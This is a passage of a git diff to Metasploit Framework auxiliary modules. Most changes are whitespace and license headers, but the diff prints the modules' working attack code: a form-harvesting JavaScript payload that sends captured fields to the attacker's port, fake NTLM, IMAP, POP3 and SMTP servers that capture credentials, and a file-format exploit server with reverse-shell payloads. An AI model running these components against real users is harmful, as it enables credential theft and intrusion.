cli.put(res) - return + return end - + # Sonic.com's Update Service if (req['Host'] == 'updateservice.sonic.com') print_status("HTTP #{cli.peerhost} is running a Sonic.com product that checks for online updates") - end - + end + # The google maps / stocks view on the iPhone if (req['Host'] == 'iphone-wu.apple.com') case req.resource @@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary print_status("HTTP #{cli.peerhost} is request #{req.resource} via the iPhone") end end - + # The itunes store on the iPhone - if(req['Host'] == 'phobos.apple.com') + if(req['Host'] == 'phobos.apple.com') print_status("HTTP #{cli.peerhost} is using iTunes Store on the iPhone") # GET /bag.xml end @@ -336,13 +336,13 @@ class Metasploit3 < Msf::Auxiliary "png" => "image/png", "gif" => "image/gif", } - + req_ext = req.resource.split(".")[-1].downcase - + if(ctypes[req_ext]) ctype = ctypes['gif'] - data = + data = "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00" + "\x00\xff\xff\xff\xff\xff\xff\x2c\x00\x00\x00\x00" + "\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b" @@ -357,14 +357,14 @@ class Metasploit3 < Msf::Auxiliary return end - + buff = '' if(@myautopwn) buff << "<iframe src='http://#{@myautopwn_host}:#{@myautopwn_port}#{@myautopwn_uri}'></iframe>" end - + list = File.readlines(@sitelist) list.each do |site| next if site =~ /^#/ @@ -372,11 +372,11 @@ class Metasploit3 < Msf::Auxiliary next if site.length == 0 buff << "<iframe src='http://#{site}:#{@myport}/forms.html'></iframe>" end - + data = File.read(@template) data.gsub!(/%CONTENT%/, buff) - - res = + + res = "HTTP/1.1 200 OK\r\n" + "Host: #{mysrc}\r\n" + "Expires: 0\r\n" + @@ -386,16 +386,16 @@ class Metasploit3 < Msf::Auxiliary "Connection: Close\r\n\r\n#{data}" cli.put(res) - return - + return + end - - + + def inject_forms(site) domain = site.gsub(/(\.\.|\\|\/)/, "") domain = "www." + domain if domain !~ /^www/i - + while(domain.length > 0) form_file = File.join(@formsdir, domain) + ".txt" @@ -404,24 +404,24 @@ class Metasploit3 < Msf::Auxiliary form_data = File.read(form_file) break end - + parts = domain.split(".") parts.shift domain = parts.join(".") end - + %| <html> <head> <script language="javascript"> - function processForms() { + function processForms() { var i = 0; while(form = document.forms[i]) { - + res = ""; var x = 0; var f = 0; - + while(e = form.elements[x]) { if (e.name.length > 0 && e.value.length > 0 && e.value != "on"){ res += e.name + "=" + e.value + "\x00"; @@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary } x++; } - + if(f) { url = "http://"+document.domain+":#{@myport}/formrec/" + escape(res); fra = document.createElement("iframe"); @@ -437,7 +437,7 @@ class Metasploit3 < Msf::Auxiliary fra.style.visibility = 'hidden'; document.body.appendChild(fra); } - + i++; } } @@ -449,8 +449,8 @@ class Metasploit3 < Msf::Auxiliary </body> </html> -| - +| + end end diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 605c300ae1..cb4f9bd3f0 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'rex/proto/smb/utils' require 'rex/proto/smb/constants' @@ -10,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Client MS Credential Catcher', 'Version' => '$$', 'Description' => %q{ This module attempts to quietly catch NTLM/LM Challenge hashes. }, - 'Author' => + 'Author' => [ 'Ryan Linn <sussurro[at]happypacket.net>', ], @@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'WebServer' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer' ], @@ -36,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('LOGFILE', [ false, "The local filename to store the captured hashes", nil ]), OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]) - + ], self.class) register_advanced_options([ OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]), @@ -45,12 +56,12 @@ class Metasploit3 < Msf::Auxiliary OptString.new('DNSDOMAIN', [ false, "The default DNS domain name to use for NTLM authentication", "example.com"]), OptBool.new('FORCEDEFAULT', [ false, "Force the default settings", false]) ], self.class) - + @challenge = "\x11\x22\x33\x44\x55\x66\x77\x88" end - - def on_request_uri(cli, request) + + def on_request_uri(cli, request) print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri when %r{^#{datastore['URIPATH']}.*sessid=} @@ -108,13 +119,13 @@ class Metasploit3 < Msf::Auxiliary chalhash = UTILS.process_type1_message(hash,@challenge,domain,server,dnsname,dnsdomain) response.headers['WWW-Authenticate'] = "NTLM " + chalhash return response - + #if the message is a type 3 message, then we have our creds elsif(message[8] == 0x03) domain,user,host,lm_hash,ntlm_hash = UTILS.process_type3_message(hash) print_status("#{cli.peerhost}: #{domain}\\#{user} #{lm_hash}:#{ntlm_hash} on #{host}") - - if(datastore['LOGFILE']) + + if(datastore['LOGFILE']) fd = File.open(datastore['LOGFILE'], "a") fd.puts( [ @@ -129,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary ) fd.close end - + if(datastore['PWFILE'] and user and lm_hash) fd = File.open(datastore['PWFILE'], "a+") fd.puts( @@ -141,8 +152,8 @@ class Metasploit3 < Msf::Auxiliary ntlm_hash ? ntlm_hash : "0" * 32 ].join(":").gsub(/\n/, "\\n") ) - fd.close - + fd.close + end response = create_response(200) return response @@ -152,11 +163,11 @@ class Metasploit3 < Msf::Auxiliary end end - + def parse_type1_domain(message) domain = nil workstation = nil - + reqflags = message[12..15] reqflags = Integer("0x" + reqflags.unpack("h8").to_s.reverse) @@ -171,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary workstation = message[wor_off,wor_len].to_s end return domain,workstation - + end - + end diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 4a9d0eca17..0b09ff0aee 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: IMAP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -54,24 +54,24 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "* OK IMAP4\r\n" end - + def on_client_data(c) data = c.get_once return if not data num,cmd,arg = data.strip.split(/\s+/, 3) arg ||= "" - - - if(cmd.upcase == "CAPABILITY") + + + if(cmd.upcase == "CAPABILITY") c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n" c.put "#{num} OK CAPABILITY completed.\r\n" end - + if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI") c.put "+ \r\n" cookie1 = c.get_once @@ -85,9 +85,9 @@ class Metasploit3 < Msf::Auxiliary :user => cookie1, :pass => cookie2 ) - return + return end - + if(cmd.upcase == "LOGIN") @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2) @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") return end - + if(cmd.upcase == "LOGOUT") c.put("* BYE IMAP4rev1 Server logging out\r\n") c.put("#{num} OK LOGOUT completed\r\n") @@ -112,9 +112,9 @@ class Metasploit3 < Msf::Auxiliary @state[c][:pass] = data.strip c.put "#{num} NO LOGIN FAILURE\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f204ba049f..928d02242b 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: POP3', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -56,18 +56,18 @@ class Metasploit3 < Msf::Auxiliary @myport = datastore['SRVPORT'] exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "+OK\r\n" end - + def on_client_data(c) data = c.get_once return if not data cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + if(cmd.upcase == "USER") @state[c][:user] = arg c.put "+OK\r\n" @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary if(cmd.upcase == "PASS") @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'pop3', @@ -88,33 +88,33 @@ class Metasploit3 < Msf::Auxiliary print_status("POP3 LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") @state[c][:pass] = data.strip c.put "+OK\r\n" - return + return end if(cmd.upcase == "STAT") c.put "+OK 0 0\r\n" - return + return end if(cmd.upcase == "CAPA") c.put "-ERR No Extended Capabilities\r\n" - return + return end if(cmd.upcase == "LIST") c.put "+OK 0 Messages\r\n" - return + return end if(cmd.upcase == "QUIT" || cmd.upcase == "RSET" || cmd.upcase == "DELE") c.put "+OK\r\n" - return + return end - + print_status("POP3 UNKNOWN CMD #{@state[c][:name]} \"#{data.strip}\"") c.put "+OK\r\n" end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 22b1ec1165..ec0243ce77 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: SMTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -54,23 +54,23 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "220 SMTP Server Ready\r\n" end - + def on_client_data(c) data = c.get_once return if not data - + print_status("SMTP: #{data.strip}") - + if(@state[c][:data_mode]) - + @state[c][:data_buff] ||= '' @state[c][:data_buff] += data - + idx = @state[c][:data_buff].index("\r\n.\r\n") if(idx) report_note( @@ -82,44 +82,44 @@ class Metasploit3 < Msf::Auxiliary @state[c][:data_mode] = nil c.put "250 OK\r\n" end - + return end - - + + cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + case cmd.upcase when 'HELO', 'EHLO' c.put "250 OK\r\n" return - + when 'MAIL' x,from = data.strip.split(":", 2) @state[c][:from] = from.strip c.put "250 OK\r\n" return - + when 'RCPT' x,targ = data.strip.split(":", 2) @state[c][:rcpt] = targ.strip c.put "250 OK\r\n" return - + when 'DATA' @state[c][:data_mode] = true c.put "500 Error\r\n" return - + when 'QUIT' c.put "221 OK\r\n" return - + when 'PASS' - + @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'pop3', @@ -133,9 +133,9 @@ class Metasploit3 < Msf::Auxiliary c.put "503 Server Error\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 6ec496b842..b481d29746 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DNS Spoofing Helper Service', @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi DNS code from Karma. - + }, 'Author' => ['hdm', 'ddz'], 'License' => MSF_LICENSE, @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Service' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Service' ], @@ -49,10 +49,10 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - - def run + + def run @targ = datastore['TARGETHOST'] - + if(@targ and @targ.strip.length == 0) @targ = nil end @@ -84,17 +84,17 @@ class Metasploit3 < Msf::Auxiliary request.qr = 1 request.ra = 1 - + names << "IN #{tc_s} #{name}" case tc_s when 'IN::TXT' - print_status("#{Time.now} PASSED #{addr[3]}:#{addr[1]} XID #{request.id} #{name}") + print_status("#{Time.now} PASSED #{addr[3]}:#{addr[1]} XID #{request.id} #{name}") answer = Resolv::DNS::Resource::IN::TXT.new("#{addr[3]}:#{addr[1]} #{names.join(",")}") request.add_answer(name, 1, answer) reply = true end } - + if(reply) @sock.send(request.encode(), 0, addr[3], addr[1]) else diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb index 93773bf0fd..1ae874df54 100644 --- a/modules/auxiliary/server/file_autopwn.rb +++ b/modules/auxiliary/server/file_autopwn.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,15 +17,15 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'File Format Exploit Generator', 'Version' => '$Revision: 8210 $', 'Description' => %q{ This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt. }, - 'Author' => + 'Author' => [ 'et', ], @@ -29,68 +33,68 @@ class Metasploit3 < Msf::Auxiliary 'Actions' => [ [ 'WebServer', { - 'Description' => 'Deliver file format exploits in a web page with links to the actual files' + 'Description' => 'Deliver file format exploits in a web page with links to the actual files' } ], [ 'OnlyFiles', { - 'Description' => 'Create file format exploits in selected directory' + 'Description' => 'Create file format exploits in selected directory' } ], - [ 'list', { + [ 'list', { 'Description' => 'List the exploit modules that would be started' } ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer', 'Email' ], 'DefaultAction' => 'WebServer')) register_options([ - OptAddress.new('LHOST', [ true, + OptAddress.new('LHOST', [ true, 'The IP address to use for reverse-connect payloads' ]), - OptString.new('OUTPUTPATH', [ true, + OptString.new('OUTPUTPATH', [ true, 'The location of the files.', File.join(Msf::Config.get_config_root, 'exploits') ]), - OptBool.new('CREATEFILES', [ true, + OptBool.new('CREATEFILES', [ true, 'Set to false in case files are already in the defined path', true - ]), - OptBool.new('USECONTENTTYPE', [ true, + ]), + OptBool.new('USECONTENTTYPE', [ true, 'Use Content-type header according to file extension. Many exploits may fail depending on this value', true - ]), - + ]), + ], self.class) register_advanced_options([ - OptString.new('MATCH', [false, + OptString.new('MATCH', [false, 'Only attempt to use exploits whose name matches this regex' ]), - OptString.new('EXCLUDE', [false, + OptString.new('EXCLUDE', [false, 'Only attempt to use exploits whose name DOES NOT match this regex' ]), - OptBool.new('USEMODNAME', [false, + OptBool.new('USEMODNAME', [false, 'Use module names as file names', true ]), - OptBool.new('USEIFRAMES', [false, + OptBool.new('USEIFRAMES', [false, 'Deliver each file as an iframe in webserver', false ]), - OptString.new('TITLE', [ true, + OptString.new('TITLE', [ true, 'The HTML page title.', 'WALL oF SHAME' ]), - OptString.new('COMMENT', [ true, + OptString.new('COMMENT', [ true, 'HTML page text.', '<b>Welcome!</b><br>' ]), - OptPort.new('LPORT_WIN32', [false, + OptPort.new('LPORT_WIN32', [false, 'The port to use for Windows reverse-connect payloads, default is 3333' ]), - OptPort.new('LPORT_MULTI', [false, + OptPort.new('LPORT_MULTI', [false, 'The port to use for Multi reverse-connect payloads, default is 4444' ]), - OptPort.new('LPORT_MAC', [false, + OptPort.new('LPORT_MAC', [false, 'The port to use for Mac reverse-connect payloads, default is 5555' ]), - OptPort.new('LPORT_GENERIC', [false, + OptPort.new('LPORT_GENERIC', [false, 'The port to use for generic reverse-connect payloads, default is 6666' ]), ], self.class) @@ -104,14 +108,14 @@ class Metasploit3 < Msf::Auxiliary def run storexp = File.join(Msf::Config.get_config_root, 'exploits') Dir.mkdir(storexp) unless File.directory?(storexp) - + if (action.name == 'list') m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{} e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$} [ [framework.exploits, 'exploit' ] ].each do |mtype| mtype[0].each_module do |name, mod| m = mod.new - + if ((m.kind_of? Msf::Exploit::FILEFORMAT) and name =~ m_regex and name !~ e_regex) @exploits[name] = nil print_line name @@ -124,11 +128,11 @@ class Metasploit3 < Msf::Auxiliary # tout = Serializer::ReadableText.dump_exploit_target(m, ' ') # print_line tout #rescue - # print_error "Error retrieving targets in #{name}" - #end - end + # print_error "Error retrieving targets in #{name}" + #end + end end - end + end print_line print_status("Found #{@exploits.length} exploit modules") elsif (action.name == 'WebServer') @@ -136,11 +140,11 @@ class Metasploit3 < Msf::Auxiliary warn_no_database end start_exploit_modules() - + if !datastore['CREATEFILES'] print_status("FILES NOT CREATED") end - + if @exploits.length < 1 and datastore["CREATEFILES"] print_error("No exploits, check your MATCH and EXCLUDE settings") return false @@ -151,12 +155,12 @@ class Metasploit3 < Msf::Auxiliary warn_no_database end start_exploit_modules() - - if @exploits.length < 1 + + if @exploits.length < 1 print_error("No exploits, check your MATCH and EXCLUDE settings") return false - end - end + end + end end @@ -209,22 +213,22 @@ class Metasploit3 < Msf::Auxiliary else lport = @gen_lport payload='generic/shell_reverse_tcp' - end + end @payloads[lport] = payload if datastore['CREATEFILES'] print_status("File Format exploit #{name} with payload #{payload}") end - + @exploits[name].datastore['SRVHOST'] = datastore['SRVHOST'] @exploits[name].datastore['SRVPORT'] = datastore['SRVPORT'] # For testing, set the exploit uri to the name of the exploit so it's # easy to tell what is happening from the browser. @exploits[name].datastore['OUTPUTPATH'] = datastore['OUTPUTPATH'] - + if (datastore['USEMODNAME']) - @exploits[name].datastore['FILENAME'] = name.gsub(/[\\\/]/, '_') + '_' + @exploits[name].datastore['FILENAME'] + @exploits[name].datastore['FILENAME'] = name.gsub(/[\\\/]/, '_') + '_' + @exploits[name].datastore['FILENAME'] else # Later change for some simple names @exploits[name].datastore['FILENAME'] = filerename(File.extname(@exploits[name].datastore['FILENAME'])) @@ -234,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary @exploits[name].datastore['LHOST'] = @lhost @exploits[name].datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread' @exploits[name].datastore['DisablePayloadHandler'] = true - + if datastore['CREATEFILES'] @exploits[name].exploit_simple( 'LocalInput' => self.user_input, @@ -254,12 +258,12 @@ class Metasploit3 < Msf::Auxiliary @exploits.delete(name) return false end - end + end return true end - def start_exploit_modules() + def start_exploit_modules() @lhost = (datastore['LHOST'] || "0.0.0.0") print_line @@ -268,8 +272,8 @@ class Metasploit3 < Msf::Auxiliary print_line m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{} e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$} - - + + [ [framework.exploits, 'exploit' ] ].each do |mtype| framework.exploits.each_module do |name, mod| m = mod.new @@ -278,12 +282,12 @@ class Metasploit3 < Msf::Auxiliary end end end - + if action.name == 'OnlyFiles' print_status "--- Done. Files created in #{datastore['OUTPUTPATH']}" return end - + # start handlers for each type of payload [@win_lport, @lin_lport, @osx_lport, @gen_lport].each do |lport| if (lport and @payloads[lport]) @@ -309,16 +313,16 @@ class Metasploit3 < Msf::Auxiliary end - def on_request_uri(cli, request) + def on_request_uri(cli, request) # - # I have NOT fixed dir. transversals! + # I have NOT fixed dir. transversals! # - + print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri when self.get_resource - # This is the first request. + # This is the first request. response = create_response() response["Expires"] = "0" @@ -329,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary Dir.foreach(datastore['OUTPUTPATH']) do |entry| if entry == '.' or entry == '..' # do nothing - else + else if !datastore['USEIFRAMES'] response.body << "<a href= #{self.get_resource+'/'+entry}>#{entry}</a><br>" else @@ -341,13 +345,13 @@ class Metasploit3 < Msf::Auxiliary cli.send_response(response) when %r{^#{self.get_resource}.*} - + fname = request.uri.gsub("#{self.get_resource}/","") - + response = create_response() response["Expires"] = "0" - - + + if datastore['USECONTENTTYPE'] response["Content-type"] = ctype(File.extname(fname))['ctype'] if ctype(File.extname(fname))['cdisp'] @@ -357,9 +361,9 @@ class Metasploit3 < Msf::Auxiliary response["Content-type"] = "application/octet-stream" response["Content-disposition"] = "attachment; filename=#{fname}" end - + fullname = File.join(datastore['OUTPUTPATH'],fname) - + if File.exist?(fullname) and File.file?(fullname) src = File.open(fullname, "rb") while (not src.eof?) @@ -378,13 +382,13 @@ class Metasploit3 < Msf::Auxiliary return false end end - + def filerename(ext) # - # A sample way to change file name by type instead of using the ugly + # A sample way to change file name by type instead of using the ugly # exploit name # - + case ext when ".html" then n = "pr0n" + Rex::Text.rand_text_numeric(4) @@ -398,28 +402,28 @@ class Metasploit3 < Msf::Auxiliary n = "test" + Rex::Text.rand_text_numeric(2) when ".m3u" then n = "musical" + Rex::Text.rand_text_numeric(2) - else + else n = "data" + Rex::Text.rand_text_numeric(4) end - + n << ext - + return n - + end def ctype(ext) aret = {} - - + + # - # Need to force download as some exploits (i.e. pdf) - # dont work thru the browser only work when the file is saved and/or opened + # Need to force download as some exploits (i.e. pdf) + # dont work thru the browser only work when the file is saved and/or opened # - + # ctype: Content-type # cdisp: true/false Include a "Content-disposition" header to force save as - + case ext when ".html" then aret['ctype'] = "text/html" @@ -442,12 +446,12 @@ class Metasploit3 < Msf::Auxiliary when ".m3u" then aret['ctype'] = "audio/x-mpegurl" aret['cdisp'] = false - else + else aret['ctype'] = "application/octet-stream" aret['cdisp'] = false end return aret - end + end def warn_no_database print_error("WARNING: Database is disabled") diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 9d6393bd25..eb780803a2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end return end - + def on_client_command_pass(c,arg) @state[c][:pass] = arg if(not datastore['FTPPASS'] or (arg == datastore['FTPPASS'])) @@ -70,8 +70,8 @@ class Metasploit3 < Msf::Auxiliary @state[c][:auth] = false end return - end - + end + def on_client_command_retr(c,arg) print_status("#{@state[c][:name]} FTP download request for #{arg}") @@ -79,32 +79,32 @@ class Metasploit3 < Msf::Auxiliary c.put "500 Access denied\r\n" return end - + path = ::File.join(datastore['FTPROOT'], arg.gsub("../", '').gsub("..\\", '')) if(not ::File.exists?(path)) c.put "550 File does not exist\r\n" return end - + conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") return end - + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") conn.put(::File.read(path, ::File.size(path))) c.put("226 Transfer complete.\r\n") conn.close end - + def on_client_command_list(c,arg) if(not @state[c][:auth]) c.put "500 Access denied\r\n" return end - + conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") @@ -120,28 +120,28 @@ class Metasploit3 < Msf::Auxiliary end if(::File.file?(path)) buf << "rwsx--r--r 1 1 512 Jun 1 2001 #{ent}\r\n" - end + end end - + c.put("150 Opening ASCII mode data connection for /bin/ls\r\n") conn.put("total #{buf.length}\r\n" + buf) - c.put("226 Transfer complete.\r\n") + c.put("226 Transfer complete.\r\n") conn.close end - + def on_client_command_size(c,arg) - + if(not @state[c][:auth]) c.put "500 Access denied\r\n" return end - + path = ::File.join(datastore['FTPROOT'], arg.gsub("../", '').gsub("..\\", '')) if(not ::File.exists?(path)) c.put "550 File does not exist\r\n" return end - + c.put("213 #{::File.size(path)}\r\n") end diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 79d370e122..ab2a8ce137 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'SOCKS Proxy UNC Path Redirection', @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Proxy' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Proxy' ], @@ -56,12 +56,12 @@ class Metasploit3 < Msf::Auxiliary def on_client_connect(client) # print_status("New connection from #{client.peerhost}:#{client.peerport}") end - + def on_client_data(client) # print_status("Data from #{client.peerhost}:#{client.peerport}") process_socks(client) end - + def on_client_close(client) # print_status("Closed connection from #{client.peerhost}:#{client.peerport}") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Auxiliary client.put rej true end - + def process_socks(client) req = client.get_once return if !(req and req.length > 2) - + # Versions case req[0] when 0x04 - + sver, sreq, sport, shost, suser, sname = req.unpack('CCnA4Z*Z*') - + # Handle connections only if (sreq != 0x01) return reject(client) @@ -101,16 +101,16 @@ class Metasploit3 < Msf::Auxiliary print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport} #{suser.inspect}") client.put("\x00\x5a\x00\x00\x00\x00\x00\x00") - + when 0x05 - + sver, scnt, sauth = req.unpack('CCA*') client.put("\x05\x00") - + req = client.get_once - + sver, sreq, sdmp, stype = req.unpack('CCCC') - + # Handle connections only if (sreq != 0x01) return reject(client) @@ -121,27 +121,27 @@ class Metasploit3 < Msf::Auxiliary when 0x01 shost = req[4,4].unpack('C*').join('.') sport = req[8,2].unpack('n')[0] - + when 0x03 shostlen = req[4] shost = req[5, shostlen] sport = req[5+shostlen, 2].unpack('n')[0] - + when 0x04 shost = req[4,16].unpack('n').map{ |x| "%.2x" % x }.join(':') - sport = req[20,2].unpack('n')[0] + sport = req[20,2].unpack('n')[0] end - - print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport}") - + + print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport}") + res = "\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00" client.put res - + else return reject(client) end - - + + req = client.get_once hed = req ? req.split(/\n/)[0].strip : '' host = datastore['UNCHOST'] || Rex::Socket.source_address(client.peerhost) @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary filename = Rex::Text.rand_text_alpha(8) print_status("Request from #{client.peerhost}:#{client.peerport}: #{hed}") - + body = %Q| <html><head><title>#{Rex::Text.rand_text_alpha(8)} @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary res << "Content-Type: text/html\r\n" res << "Connection: Close\r\n" res << "Content-Length: #{body.length}\r\n\r\n#{body}" - + client.put(res) end diff --git a/modules/auxiliary/sniffer/psnuffle.rb 